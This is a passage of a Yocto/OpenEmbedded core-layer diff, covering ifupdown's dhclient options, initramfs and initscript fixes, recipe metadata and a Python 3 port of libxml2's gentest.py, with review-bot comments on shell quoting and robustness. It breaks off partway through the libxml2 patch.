+++ b/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch
@@ -0,0 +1,65 @@
+From e2263b58d7733835355d7b46c3caa96d911a4717 Mon Sep 17 00:00:00 2001
+From: Simon Schwarz <simon.schwarz@infoteam.de>
+Date: Fri, 6 Nov 2020 08:53:20 +0100
+Subject: [PATCH] inet6.defn: Added -1 option to dhclient on upping an
+ interface
+
+This prevents hangs on startup when no server is available and dhcpv6 is used
+
+Upstream-Status: Pending
+
+Signed-off-by: Simon Schwarz <simon.schwarz@infoteam.de>
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ inet6.defn | 12 ++++++------
+ 1 file changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/inet6.defn b/inet6.defn
+index 73dce24..25022e3 100644
+--- a/inet6.defn
++++ b/inet6.defn
+@@ -29,9 +29,9 @@ method auto
+ if (var_set("accept_ra", ifd) && !var_true("accept_ra", ifd))
+ /sbin/ip link set dev %iface% up
+ /lib/ifupdown/wait-for-ll6.sh if (var_true("dhcp", ifd) && execable("/lib/ifupdown/wait-for-ll6.sh"))
+- /sbin/dhclient -6 -v -P -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -P -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ if (var_true("dhcp", ifd) && execable("/sbin/dhclient") && var_true("request_prefix", ifd))
+- /sbin/dhclient -6 -v -S -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -S -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ elsif (var_true("dhcp", ifd) && execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (var_true("dhcp", ifd))
+@@ -154,9 +154,9 @@ method dhcp
+ if (var_set("accept_ra", ifd) && !var_true("accept_ra", ifd))
+ /sbin/ip link set dev %iface% [[address %hwaddress%]] up
+ /lib/ifupdown/wait-for-ll6.sh if (execable("/lib/ifupdown/wait-for-ll6.sh"))
+- /sbin/dhclient -6 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -P -N -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -P -N -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ if (execable("/sbin/dhclient") && var_true("request_prefix", ifd))
+- /sbin/dhclient -6 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ elsif (execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (1)
+@@ -325,7 +325,7 @@ method dhcp
+
+ up
+ /sbin/ifconfig %iface% [[link %hwaddress%]] up
+- /sbin/dhclient -6 -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ if (execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (1)
+@@ -397,7 +397,7 @@ method dhcp
+ up
+ [[Warning: Option hwaddress: %hwaddress% not yet supported]]
+ inetutils-ifconfig --interface %iface% --up
+- /sbin/dhclient -6 -pf /run/dhclient6.%iface///.%.pid -lf /var/lib/dhcp/dhclient6.%iface///.%.leases -I -df /var/lib/dhcp/dhclient.%iface///.%.leases %iface% \
++ /sbin/dhclient -6 -1 -pf /run/dhclient6.%iface///.%.pid -lf /var/lib/dhcp/dhclient6.%iface///.%.leases -I -df /var/lib/dhcp/dhclient.%iface///.%.leases %iface% \
+ if (execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (1)
+--
+2.17.1
+
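Review bot: The patch description does not say what `-1` costs. As far as I know, with this flag dhclient gives up after one attempt and exits non-zero instead of continuing to retry, so an interface brought up before the DHCPv6 server is reachable would stay without a lease until ifup is run again. That is worth stating next to "This prevents hangs on startup", along the lines of `Note: with -1 the client does not keep retrying; re-run ifup once the server is available.` The flag is added to all six dhclient invocations in the patch, including the `request_prefix` variants, so the note applies to each of them.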
diff --git a/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb b/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
index 53cb971d33..c3681defdc 100644
--- a/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
+++ b/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
@@ -1,4 +1,5 @@
SUMMARY = "ifupdown: basic ifup and ifdown used by initscripts"
+HOMEPAGE = "https://salsa.debian.org/debian/ifupdown"
DESCRIPTION = "High level tools to configure network interfaces \
This package provides the tools ifup and ifdown which may be used to \
configure (or, respectively, deconfigure) network interfaces, based on \
@@ -6,11 +7,12 @@ the file /etc/network/interfaces."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
-SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https;branch=master \
file://defn2-c-man-don-t-rely-on-dpkg-architecture-to-set-a.patch \
file://99_network \
file://0001-Define-FNM_EXTMATCH-for-musl.patch \
file://0001-Makefile-do-not-use-dpkg-for-determining-OS-type.patch \
+ file://0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch \
file://run-ptest \
${@bb.utils.contains('DISTRO_FEATURES', 'ptest', 'file://tweak-ptest-script.patch', '', d)} \
"
diff --git a/meta/recipes-core/images/build-appliance-image_15.0.0.bb b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
index 4f935be730..035312f4d9 100644
--- a/meta/recipes-core/images/build-appliance-image_15.0.0.bb
+++ b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
@@ -22,9 +22,9 @@ APPEND += "rootfstype=ext4 quiet"
DEPENDS = "zip-native python3-pip-native"
IMAGE_FSTYPES = "wic.vmdk"
-inherit core-image module-base setuptools3
+inherit core-image setuptools3
-SRCREV ?= "5ad59495782e8dbcb2b9d18e27ca4bde131465b4"
+SRCREV ?= "77442211926cbe93d60108f6df4abda3bc06b735"
SRC_URI = "git://git.yoctoproject.org/poky;branch=dunfell \
file://Yocto_Build_Appliance.vmx \
file://Yocto_Build_Appliance.vmxf \
@@ -61,12 +61,6 @@ fakeroot do_populate_poky_src () {
# Place the README_VirtualBox_Toaster file in builders home folder.
cp ${WORKDIR}/README_VirtualBox_Toaster.txt ${IMAGE_ROOTFS}/home/builder/
- # Create a symlink, needed for out-of-tree kernel modules build
- if [ ! -e ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build ]; then
- rm -f ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build
- lnr ${IMAGE_ROOTFS}${KERNEL_SRC_PATH} ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build
- fi
-
echo "INHERIT += \"rm_work\"" >> ${IMAGE_ROOTFS}/home/builder/poky/build/conf/auto.conf
echo "export LC_ALL=en_US.utf8" >> ${IMAGE_ROOTFS}/home/builder/.bashrc
diff --git a/meta/recipes-core/initrdscripts/files/init-install-efi.sh b/meta/recipes-core/initrdscripts/files/init-install-efi.sh
index b6855b5aac..f667518b89 100644
--- a/meta/recipes-core/initrdscripts/files/init-install-efi.sh
+++ b/meta/recipes-core/initrdscripts/files/init-install-efi.sh
@@ -279,6 +279,11 @@ fi
umount /tgt_root
+# copy any extra files needed for ESP
+if [ -d /run/media/$1/esp ]; then
+ cp -r /run/media/$1/esp/* /boot
+fi
+
# Copy kernel artifacts. To add more artifacts just add to types
# For now just support kernel types already being used by something in OE-core
for types in bzImage zImage vmlinux vmlinuz fitImage; do
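Review bot: The added copy `cp -r /run/media/$1/esp/* /boot` expands `$1` unquoted and relies on a glob. A device name with whitespace or glob characters is split or expanded, an empty `esp` directory makes `cp` fail on a literal `*`, and dot-files are skipped. Since this step populates the boot partition, quote the path and copy the directory contents without a glob: `if [ -d "/run/media/$1/esp" ]; then` and `cp -r "/run/media/$1/esp/." /boot`. Checking the `cp` exit status would also keep a partly populated ESP from going unnoticed; whether the script runs under `set -e` is not visible in this hunk.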
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/finish b/meta/recipes-core/initrdscripts/initramfs-framework/finish
index 717383ebac..dee3ab3387 100755
--- a/meta/recipes-core/initrdscripts/initramfs-framework/finish
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/finish
@@ -14,6 +14,15 @@ finish_run() {
info "Switching root to '$ROOTFS_DIR'..."
+ debug "Moving basic mounts onto rootfs"
+ for dir in `awk '/\/dev.* \/run\/media/{print $2}' /proc/mounts`; do
+ # Parse any OCT or HEX encoded chars such as spaces
+ # in the mount points to actual ASCII chars
+ dir=`printf $dir`
+ mkdir -p "${ROOTFS_DIR}/media/${dir##*/}"
+ mount -n --move "$dir" "${ROOTFS_DIR}/media/${dir##*/}"
+ done
+
debug "Moving /dev, /proc and /sys onto rootfs..."
mount --move /dev $ROOTFS_DIR/dev
mount --move /proc $ROOTFS_DIR/proc
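Review bot: The added `printf $dir` call passes the mount point as the printf format string, so a `%` in the path is read as a conversion specifier and the decoded name is mangled or the command fails. The paths come from `/proc/mounts` entries under `/run/media`, which presumably follow the labels of attached media, so the content is not under the image's control. Decode with a fixed format instead, e.g. `dir=$(printf '%b' "$dir")`, after confirming that the initramfs shell's `printf` decodes the `\040`-style octal escapes under `%b`. The `mkdir` and `mount --move` results are also unchecked, so a failed move leaves the mount behind without a message. `finish_run` continues past the end of the hunk.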
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/rootfs b/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
index 748c9391c0..1d8a0ae66d 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
@@ -67,8 +67,8 @@ rootfs_run() {
# It is unlikely to change, but keep trying anyway.
# Perhaps we pick a different device next time.
umount $ROOTFS_DIR
- fi
fi
+ fi
fi
debug "Sleeping for $delay second(s) to wait root to settle..."
sleep $delay
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
index 4c79f41285..7e92f93322 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
@@ -1,4 +1,4 @@
-#/bin/sh
+#!/bin/sh
# Copyright (C) 2011 O.S. Systems Software LTDA.
# Licensed on MIT
diff --git a/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh b/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh
index 02f0351fcb..a63e71b780 100755
--- a/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh
+++ b/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh
@@ -74,7 +74,7 @@ test "$VERBOSE" != no && echo "Activating swap"
#
# Check the root filesystem.
#
-if test -f /fastboot || test $rootcheck = no
+if test -f /fastboot || test "$rootcheck" = "no"
then
test $rootcheck = yes && echo "Fast boot, no filesystem check"
else
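Review bot: The very next line still uses the unquoted form, `test $rootcheck = yes && echo "Fast boot, no filesystem check"`, so the quoting fix covers only half of the check. When `rootcheck` is empty or unset and `/fastboot` exists, that `test` is still given a malformed expression. Quote it the same way: `test "$rootcheck" = yes && echo "Fast boot, no filesystem check"`. The `if` block continues past the end of the hunk.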
diff --git a/meta/recipes-core/initscripts/initscripts_1.0.bb b/meta/recipes-core/initscripts/initscripts_1.0.bb
index f98e42eb2e..cb5417cc39 100644
--- a/meta/recipes-core/initscripts/initscripts_1.0.bb
+++ b/meta/recipes-core/initscripts/initscripts_1.0.bb
@@ -129,7 +129,7 @@ do_install () {
update-rc.d -r ${D} rmnologin.sh start 99 2 3 4 5 .
update-rc.d -r ${D} sendsigs start 20 0 6 .
update-rc.d -r ${D} urandom start 38 S 0 6 .
- update-rc.d -r ${D} umountnfs.sh start 31 0 1 6 .
+ update-rc.d -r ${D} umountnfs.sh stop 31 0 1 6 .
update-rc.d -r ${D} umountfs start 40 0 6 .
update-rc.d -r ${D} reboot start 90 6 .
update-rc.d -r ${D} halt start 90 0 .
diff --git a/meta/recipes-core/kbd/kbd_2.2.0.bb b/meta/recipes-core/kbd/kbd_2.2.0.bb
index e5700ff57f..d10c93dfb7 100644
--- a/meta/recipes-core/kbd/kbd_2.2.0.bb
+++ b/meta/recipes-core/kbd/kbd_2.2.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Keytable files and keyboard utilities"
HOMEPAGE = "http://www.kbd-project.org/"
+DESCRIPTION = "The kbd project contains tools for managing Linux console (Linux console, virtual terminals, keyboard, etc.) – mainly, what they do is loading console fonts and keyboard maps."
# everything minus console-fonts is GPLv2+
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=892f569a555ba9c07a568a7c0c4fa63a"
diff --git a/meta/recipes-core/libxcrypt/libxcrypt.inc b/meta/recipes-core/libxcrypt/libxcrypt.inc
index 2d2a0b03e3..b6bf48ba79 100644
--- a/meta/recipes-core/libxcrypt/libxcrypt.inc
+++ b/meta/recipes-core/libxcrypt/libxcrypt.inc
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM ?= "file://LICENSING;md5=3bb6614cf5880cbf1b9dbd9e3d145e2c \
inherit autotools pkgconfig
-SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH}"
+SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH};protocol=https"
SRCREV = "823437d015cd4ab4d100ed205f218681b03ae45c"
SRCBRANCH ?= "develop"
diff --git a/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch b/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch
new file mode 100644
index 0000000000..b0d26d1c08
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch
@@ -0,0 +1,813 @@
+From b5125000917810731bc28055c0445d571121f80e Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 21 Apr 2022 00:45:58 +0200
+Subject: [PATCH] Port gentest.py to Python 3
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/343fc1421cdae097fa6c4cffeb1a065a40be6bbb]
+
+* fixes:
+
+make[1]: 'testReader' is up to date.
+ File "../libxml2-2.9.10/gentest.py", line 11
+ print "libxml2 python bindings not available, skipping testapi.c generation"
+ ^
+SyntaxError: Missing parentheses in call to 'print'. Did you mean print("libxml2 python bindings not available, skipping testapi.c generation")?
+make[1]: [Makefile:2078: testapi.c] Error 1 (ignored)
+
+...
+
+make[1]: 'testReader' is up to date.
+ File "../libxml2-2.9.10/gentest.py", line 271
+ return 1
+ ^
+TabError: inconsistent use of tabs and spaces in indentation
+make[1]: [Makefile:2078: testapi.c] Error 1 (ignored)
+
+...
+
+aarch64-oe-linux-gcc: error: testapi.c: No such file or directory
+aarch64-oe-linux-gcc: fatal error: no input files
+compilation terminated.
+make[1]: *** [Makefile:1275: testapi.o] Error 1
+
+But there is still a bit mystery why it worked before, because check-am
+calls gentest.py with $(PYTHON), so it ignores the shebang in the script
+and libxml2 is using python3native (through python3targetconfig.bbclass)
+so something like:
+
+libxml2/2.9.10-r0/recipe-sysroot-native/usr/bin/python3-native/python3 gentest.py
+
+But that still fails (now without SyntaxError) with:
+libxml2 python bindings not available, skipping testapi.c generation
+
+because we don't have dependency on libxml2-native (to provide libxml2
+python bindings form python3native) and exported PYTHON_SITE_PACKAGES
+might be useless (e.g. /usr/lib/python3.8/site-packages on Ubuntu-22.10
+which uses python 3.10 and there is no site-packages with libxml2)
+
+Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com>
+---
+ gentest.py | 421 ++++++++++++++++++++++++++---------------------------
+ 1 file changed, 209 insertions(+), 212 deletions(-)
+
+diff --git a/gentest.py b/gentest.py
+index b763300..0756706 100755
+--- a/gentest.py
++++ b/gentest.py
+@@ -8,7 +8,7 @@ import string
+ try:
+ import libxml2
+ except:
+- print "libxml2 python bindings not available, skipping testapi.c generation"
++ print("libxml2 python bindings not available, skipping testapi.c generation")
+ sys.exit(0)
+
+ if len(sys.argv) > 1:
+@@ -227,7 +227,7 @@ extra_post_call = {
+ if (old != NULL) {
+ xmlUnlinkNode(old);
+ xmlFreeNode(old) ; old = NULL ; }
+- ret_val = NULL;""",
++\t ret_val = NULL;""",
+ "xmlTextMerge":
+ """if ((first != NULL) && (first->type != XML_TEXT_NODE)) {
+ xmlUnlinkNode(second);
+@@ -236,7 +236,7 @@ extra_post_call = {
+ """if ((ret_val != NULL) && (ret_val != ncname) &&
+ (ret_val != prefix) && (ret_val != memory))
+ xmlFree(ret_val);
+- ret_val = NULL;""",
++\t ret_val = NULL;""",
+ "xmlNewDocElementContent":
+ """xmlFreeDocElementContent(doc, ret_val); ret_val = NULL;""",
+ "xmlDictReference": "xmlDictFree(dict);",
+@@ -268,29 +268,29 @@ modules = []
+ def is_skipped_module(name):
+ for mod in skipped_modules:
+ if mod == name:
+- return 1
++ return 1
+ return 0
+
+ def is_skipped_function(name):
+ for fun in skipped_functions:
+ if fun == name:
+- return 1
++ return 1
+ # Do not test destructors
+- if string.find(name, 'Free') != -1:
++ if name.find('Free') != -1:
+ return 1
+ return 0
+
+ def is_skipped_memcheck(name):
+ for fun in skipped_memcheck:
+ if fun == name:
+- return 1
++ return 1
+ return 0
+
+ missing_types = {}
+ def add_missing_type(name, func):
+ try:
+ list = missing_types[name]
+- list.append(func)
++ list.append(func)
+ except:
+ missing_types[name] = [func]
+
+@@ -310,7 +310,7 @@ def add_missing_functions(name, module):
+ missing_functions_nr = missing_functions_nr + 1
+ try:
+ list = missing_functions[module]
+- list.append(name)
++ list.append(name)
+ except:
+ missing_functions[module] = [name]
+
+@@ -319,45 +319,45 @@ def add_missing_functions(name, module):
+ #
+
+ def type_convert(str, name, info, module, function, pos):
+-# res = string.replace(str, " ", " ")
+-# res = string.replace(str, " ", " ")
+-# res = string.replace(str, " ", " ")
+- res = string.replace(str, " *", "_ptr")
+-# res = string.replace(str, "*", "_ptr")
+- res = string.replace(res, " ", "_")
++# res = str.replace(" ", " ")
++# res = str.replace(" ", " ")
++# res = str.replace(" ", " ")
++ res = str.replace(" *", "_ptr")
++# res = str.replace("*", "_ptr")
++ res = res.replace(" ", "_")
+ if res == 'const_char_ptr':
+- if string.find(name, "file") != -1 or \
+- string.find(name, "uri") != -1 or \
+- string.find(name, "URI") != -1 or \
+- string.find(info, "filename") != -1 or \
+- string.find(info, "URI") != -1 or \
+- string.find(info, "URL") != -1:
+- if string.find(function, "Save") != -1 or \
+- string.find(function, "Create") != -1 or \
+- string.find(function, "Write") != -1 or \
+- string.find(function, "Fetch") != -1:
+- return('fileoutput')
+- return('filepath')
++ if name.find("file") != -1 or \
++ name.find("uri") != -1 or \
++ name.find("URI") != -1 or \
++ info.find("filename") != -1 or \
++ info.find("URI") != -1 or \
++ info.find("URL") != -1:
++ if function.find("Save") != -1 or \
++ function.find("Create") != -1 or \
++ function.find("Write") != -1 or \
++ function.find("Fetch") != -1:
++ return('fileoutput')
++ return('filepath')
+ if res == 'void_ptr':
+ if module == 'nanoftp' and name == 'ctx':
+- return('xmlNanoFTPCtxtPtr')
++ return('xmlNanoFTPCtxtPtr')
+ if function == 'xmlNanoFTPNewCtxt' or \
+- function == 'xmlNanoFTPConnectTo' or \
+- function == 'xmlNanoFTPOpen':
+- return('xmlNanoFTPCtxtPtr')
++ function == 'xmlNanoFTPConnectTo' or \
++ function == 'xmlNanoFTPOpen':
++ return('xmlNanoFTPCtxtPtr')
+ if module == 'nanohttp' and name == 'ctx':
+- return('xmlNanoHTTPCtxtPtr')
+- if function == 'xmlNanoHTTPMethod' or \
+- function == 'xmlNanoHTTPMethodRedir' or \
+- function == 'xmlNanoHTTPOpen' or \
+- function == 'xmlNanoHTTPOpenRedir':
+- return('xmlNanoHTTPCtxtPtr');
++ return('xmlNanoHTTPCtxtPtr')
++ if function == 'xmlNanoHTTPMethod' or \
++ function == 'xmlNanoHTTPMethodRedir' or \
++ function == 'xmlNanoHTTPOpen' or \
++ function == 'xmlNanoHTTPOpenRedir':
++ return('xmlNanoHTTPCtxtPtr');
+ if function == 'xmlIOHTTPOpen':
+- return('xmlNanoHTTPCtxtPtr')
+- if string.find(name, "data") != -1:
+- return('userdata')
+- if string.find(name, "user") != -1:
+- return('userdata')
++ return('xmlNanoHTTPCtxtPtr')
++ if name.find("data") != -1:
++ return('userdata')
++ if name.find("user") != -1:
++ return('userdata')
+ if res == 'xmlDoc_ptr':
+ res = 'xmlDocPtr'
+ if res == 'xmlNode_ptr':
+@@ -366,18 +366,18 @@ def type_convert(str, name, info, module, function, pos):
+ res = 'xmlDictPtr'
+ if res == 'xmlNodePtr' and pos != 0:
+ if (function == 'xmlAddChild' and pos == 2) or \
+- (function == 'xmlAddChildList' and pos == 2) or \
++ (function == 'xmlAddChildList' and pos == 2) or \
+ (function == 'xmlAddNextSibling' and pos == 2) or \
+ (function == 'xmlAddSibling' and pos == 2) or \
+ (function == 'xmlDocSetRootElement' and pos == 2) or \
+ (function == 'xmlReplaceNode' and pos == 2) or \
+ (function == 'xmlTextMerge') or \
+- (function == 'xmlAddPrevSibling' and pos == 2):
+- return('xmlNodePtr_in');
++ (function == 'xmlAddPrevSibling' and pos == 2):
++ return('xmlNodePtr_in');
+ if res == 'const xmlBufferPtr':
+ res = 'xmlBufferPtr'
+ if res == 'xmlChar_ptr' and name == 'name' and \
+- string.find(function, "EatName") != -1:
++ function.find("EatName") != -1:
+ return('eaten_name')
+ if res == 'void_ptr*':
+ res = 'void_ptr_ptr'
+@@ -393,7 +393,7 @@ def type_convert(str, name, info, module, function, pos):
+ res = 'debug_FILE_ptr';
+ if res == 'int' and name == 'options':
+ if module == 'parser' or module == 'xmlreader':
+- res = 'parseroptions'
++ res = 'parseroptions'
+
+ return res
+
+@@ -402,28 +402,28 @@ known_param_types = []
+ def is_known_param_type(name):
+ for type in known_param_types:
+ if type == name:
+- return 1
++ return 1
+ return name[-3:] == 'Ptr' or name[-4:] == '_ptr'
+
+ def generate_param_type(name, rtype):
+ global test
+ for type in known_param_types:
+ if type == name:
+- return
++ return
+ for type in generated_param_types:
+ if type == name:
+- return
++ return
+
+ if name[-3:] == 'Ptr' or name[-4:] == '_ptr':
+ if rtype[0:6] == 'const ':
+- crtype = rtype[6:]
+- else:
+- crtype = rtype
++ crtype = rtype[6:]
++ else:
++ crtype = rtype
+
+ define = 0
+- if modules_defines.has_key(module):
+- test.write("#ifdef %s\n" % (modules_defines[module]))
+- define = 1
++ if module in modules_defines:
++ test.write("#ifdef %s\n" % (modules_defines[module]))
++ define = 1
+ test.write("""
+ #define gen_nb_%s 1
+ static %s gen_%s(int no ATTRIBUTE_UNUSED, int nr ATTRIBUTE_UNUSED) {
+@@ -433,7 +433,7 @@ static void des_%s(int no ATTRIBUTE_UNUSED, %s val ATTRIBUTE_UNUSED, int nr ATTR
+ }
+ """ % (name, crtype, name, name, rtype))
+ if define == 1:
+- test.write("#endif\n\n")
++ test.write("#endif\n\n")
+ add_generated_param_type(name)
+
+ #
+@@ -445,7 +445,7 @@ known_return_types = []
+ def is_known_return_type(name):
+ for type in known_return_types:
+ if type == name:
+- return 1
++ return 1
+ return 0
+
+ #
+@@ -471,7 +471,7 @@ def compare_and_save():
+ try:
+ os.system("rm testapi.c; mv testapi.c.new testapi.c")
+ except:
+- os.system("mv testapi.c.new testapi.c")
++ os.system("mv testapi.c.new testapi.c")
+ print("Updated testapi.c")
+ else:
+ print("Generated testapi.c is identical")
+@@ -481,17 +481,17 @@ while line != "":
+ if line == "/* CUT HERE: everything below that line is generated */\n":
+ break;
+ if line[0:15] == "#define gen_nb_":
+- type = string.split(line[15:])[0]
+- known_param_types.append(type)
++ type = line[15:].split()[0]
++ known_param_types.append(type)
+ if line[0:19] == "static void desret_":
+- type = string.split(line[19:], '(')[0]
+- known_return_types.append(type)
++ type = line[19:].split('(')[0]
++ known_return_types.append(type)
+ test.write(line)
+ line = input.readline()
+ input.close()
+
+ if line == "":
+- print "Could not find the CUT marker in testapi.c skipping generation"
++ print("Could not find the CUT marker in testapi.c skipping generation")
+ test.close()
+ sys.exit(0)
+
+@@ -505,7 +505,7 @@ test.write("/* CUT HERE: everything below that line is generated */\n")
+ #
+ doc = libxml2.readFile(srcPref + 'doc/libxml2-api.xml', None, 0)
+ if doc == None:
+- print "Failed to load doc/libxml2-api.xml"
++ print("Failed to load doc/libxml2-api.xml")
+ sys.exit(1)
+ ctxt = doc.xpathNewContext()
+
+@@ -519,9 +519,9 @@ for arg in args:
+ mod = arg.xpathEval('string(../@file)')
+ func = arg.xpathEval('string(../@name)')
+ if (mod not in skipped_modules) and (func not in skipped_functions):
+- type = arg.xpathEval('string(@type)')
+- if not argtypes.has_key(type):
+- argtypes[type] = func
++ type = arg.xpathEval('string(@type)')
++ if type not in argtypes:
++ argtypes[type] = func
+
+ # similarly for return types
+ rettypes = {}
+@@ -531,8 +531,8 @@ for ret in rets:
+ func = ret.xpathEval('string(../@name)')
+ if (mod not in skipped_modules) and (func not in skipped_functions):
+ type = ret.xpathEval('string(@type)')
+- if not rettypes.has_key(type):
+- rettypes[type] = func
++ if type not in rettypes:
++ rettypes[type] = func
+
+ #
+ # Generate constructors and return type handling for all enums
+@@ -549,49 +549,49 @@ for enum in enums:
+ continue;
+ define = 0
+
+- if argtypes.has_key(name) and is_known_param_type(name) == 0:
+- values = ctxt.xpathEval("/api/symbols/enum[@type='%s']" % name)
+- i = 0
+- vals = []
+- for value in values:
+- vname = value.xpathEval('string(@name)')
+- if vname == None:
+- continue;
+- i = i + 1
+- if i >= 5:
+- break;
+- vals.append(vname)
+- if vals == []:
+- print "Didn't find any value for enum %s" % (name)
+- continue
+- if modules_defines.has_key(module):
+- test.write("#ifdef %s\n" % (modules_defines[module]))
+- define = 1
+- test.write("#define gen_nb_%s %d\n" % (name, len(vals)))
+- test.write("""static %s gen_%s(int no, int nr ATTRIBUTE_UNUSED) {\n""" %
+- (name, name))
+- i = 1
+- for value in vals:
+- test.write(" if (no == %d) return(%s);\n" % (i, value))
+- i = i + 1
+- test.write(""" return(0);
++ if (name in argtypes) and is_known_param_type(name) == 0:
++ values = ctxt.xpathEval("/api/symbols/enum[@type='%s']" % name)
++ i = 0
++ vals = []
++ for value in values:
++ vname = value.xpathEval('string(@name)')
++ if vname == None:
++ continue;
++ i = i + 1
++ if i >= 5:
++ break;
++ vals.append(vname)
++ if vals == []:
++ print("Didn't find any value for enum %s" % (name))
++ continue
++ if module in modules_defines:
++ test.write("#ifdef %s\n" % (modules_defines[module]))
++ define = 1
++ test.write("#define gen_nb_%s %d\n" % (name, len(vals)))
++ test.write("""static %s gen_%s(int no, int nr ATTRIBUTE_UNUSED) {\n""" %
++ (name, name))
++ i = 1
++ for value in vals:
++ test.write(" if (no == %d) return(%s);\n" % (i, value))
++ i = i + 1
++ test.write(""" return(0);
+ }
+
+ static void des_%s(int no ATTRIBUTE_UNUSED, %s val ATTRIBUTE_UNUSED, int nr ATTRIBUTE_UNUSED) {
+ }
+
+ """ % (name, name));
+- known_param_types.append(name)
++ known_param_types.append(name)
+
+ if (is_known_return_type(name) == 0) and (name in rettypes):
+- if define == 0 and modules_defines.has_key(module):
+- test.write("#ifdef %s\n" % (modules_defines[module]))
+- define = 1
++ if define == 0 and (module in modules_defines):
++ test.write("#ifdef %s\n" % (modules_defines[module]))
++ define = 1
+ test.write("""static void desret_%s(%s val ATTRIBUTE_UNUSED) {
+ }
+
+ """ % (name, name))
+- known_return_types.append(name)
++ known_return_types.append(name)
+ if define == 1:
+ test.write("#endif\n\n")
+
+@@ -615,9 +615,9 @@ for file in headers:
+ # do not test deprecated APIs
+ #
+ desc = file.xpathEval('string(description)')
+- if string.find(desc, 'DEPRECATED') != -1:
+- print "Skipping deprecated interface %s" % name
+- continue;
++ if desc.find('DEPRECATED') != -1:
++ print("Skipping deprecated interface %s" % name)
++ continue;
+
+ test.write("#include <libxml/%s.h>\n" % name)
+ modules.append(name)
+@@ -679,7 +679,7 @@ def generate_test(module, node):
+ # and store the informations for the generation
+ #
+ try:
+- args = node.xpathEval("arg")
++ args = node.xpathEval("arg")
+ except:
+ args = []
+ t_args = []
+@@ -687,37 +687,37 @@ def generate_test(module, node):
+ for arg in args:
+ n = n + 1
+ rtype = arg.xpathEval("string(@type)")
+- if rtype == 'void':
+- break;
+- info = arg.xpathEval("string(@info)")
+- nam = arg.xpathEval("string(@name)")
++ if rtype == 'void':
++ break;
